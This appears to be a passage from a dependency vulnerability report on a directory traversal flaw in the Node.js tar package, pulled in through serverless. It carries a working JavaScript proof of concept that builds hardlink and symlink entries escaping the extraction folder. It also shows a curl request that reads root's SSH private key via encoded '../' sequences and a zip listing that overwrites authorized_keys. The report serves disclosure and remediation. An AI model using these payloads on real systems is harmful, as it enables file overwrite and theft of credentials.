+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys

Remediation

There is no fixed version for decompress.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: serverless@3.40.0

Detailed paths

  • Introduced through: watcher@clowdhaus/watcher serverless@3.40.0 tar@6.2.1
    Remediation: Upgrade to serverless@4.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.

PoC

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.3 or higher.

References